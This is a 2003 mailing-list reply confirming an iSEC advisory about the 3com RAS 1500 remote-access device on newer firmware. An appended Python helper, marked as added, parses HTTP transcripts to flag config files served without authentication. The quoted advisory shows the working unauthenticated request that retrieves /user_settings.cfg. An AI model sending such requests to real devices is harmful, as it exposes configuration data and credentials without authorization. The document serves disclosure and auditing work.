re:3com RAS 1500 Remote vulnerabilities.

From: Jan Kachlik (jkachlikisgroup.com)
Date: Tue Apr 01 2003 - 07:11:03 CST


Hi Piotr Chytla

>Synopsis: 3com RAS 1500 Remote vulnerabilities.
>Product: 3C433279A-US http://www.3com/ras1500
>Version: Firmware X2.0.10
>
>URL: http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
>Author: Piotr Chytla <pchisec.pl>
>Date: February 27, 2003
>
>

I tested the second bug on

SuperStack II Remote Access System 1500, Version: 2.5.0, 159,

and it works...

>Issue:
>- ------
>
> 3com SuperStack II Remote Access System 1500 is a telco device which
> provides access via BRI-ISDN/Analog to dial-in users.
> It contains two remote vulnerabilities: the first is a Denial of Service that
> leads to a system crash, the second can be used to read configuration files.

>
>2. Configuration file read
>
> An unauthorized user can read configuration and system files using the web
> interface on the RAS 1500.
>
> GET /download.htm HTTP/1.0
> HTTP/1.0 401 Unauthorized
> WWW-Authenticate: Basic realm="RAS1500"
> Content-Type: text/html
> Server: Allegro-Software-RomPager/2.10
>
> GET /user_settings.cfg HTTP/1.0
> HTTP/1.0 200 OK
> Content-Type: multipart
> Date: Mon, 25 May 1998 00:26:38 GMT
> Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
> Content-Length: 1258
> Server: Allegro-Software-RomPager/2.10
> [..]
    
    content of user_setting.cfg

--
 Best regards,
  Jan Kachlik
  jkachlikisgroup.com
 
 +---------------------------------+
 ' Kachlik Jan '
 ' Security & Network Specialist '
 ' InterSource Solutions Group '
 ' Mathonova 25, 613 00 Brno CZ '
 ' Mail: jkachlikisgroup.com '
 ' Mail: jkachlikhacktrack.com '
 ' GSM: +420.728.662.807 '
 ' ICQ: #56618470 '
 ' WebSite: http://www.isgroup.com '
 +---------------------------------+
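
Added example, not part of the original posts: an audit helper that parses a transcript of requests sent without credentials, like the exchange quoted above, and flags configuration-style paths answered with 200 while the same server challenges other pages with 401. The transcript is constructed from the quoted exchange; the function names and the SENSITIVE_EXT list are assumptions.

```python
import re

# Constructed transcript modelled on the exchange quoted in the advisory.
# Assumption: every request was sent without an Authorization header.
TRANSCRIPT = """\
GET /download.htm HTTP/1.0
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="RAS1500"
Server: Allegro-Software-RomPager/2.10

GET /user_settings.cfg HTTP/1.0
HTTP/1.0 200 OK
Content-Type: multipart
Content-Length: 1258
Server: Allegro-Software-RomPager/2.10
"""

REQUEST = re.compile(r"^(GET|HEAD|POST) (\S+) HTTP/\d\.\d$")
STATUS = re.compile(r"^HTTP/\d\.\d (\d{3})\b")
SENSITIVE_EXT = (".cfg", ".conf", ".bak", ".ini")  # assumed audit policy


def parse_exchanges(text):
    """Return one dict (path, status, headers) per request/response pair."""
    exchanges, current = [], None
    for line in text.splitlines():
        line = line.strip()
        m = REQUEST.match(line)
        if m:
            current = {"path": m.group(2), "status": None, "headers": {}}
            exchanges.append(current)
        elif current is not None:
            s = STATUS.match(line)
            if s and current["status"] is None:
                current["status"] = int(s.group(1))
            elif ":" in line:
                name, value = line.split(":", 1)
                current["headers"][name.strip().lower()] = value.strip()
    return exchanges


def unauthenticated_exposures(exchanges):
    """Sensitive paths served with 200 although the server demands auth elsewhere."""
    challenged = any(e["status"] == 401 and "www-authenticate" in e["headers"]
                     for e in exchanges)
    if not challenged:
        return []  # no evidence that this server enforces authentication at all
    return [e["path"] for e in exchanges
            if e["status"] == 200 and e["path"].lower().endswith(SENSITIVE_EXT)]
```

Running `unauthenticated_exposures(parse_exchanges(TRANSCRIPT))` on the constructed transcript reports `/user_settings.cfg`, the file the advisory shows being served without a challenge.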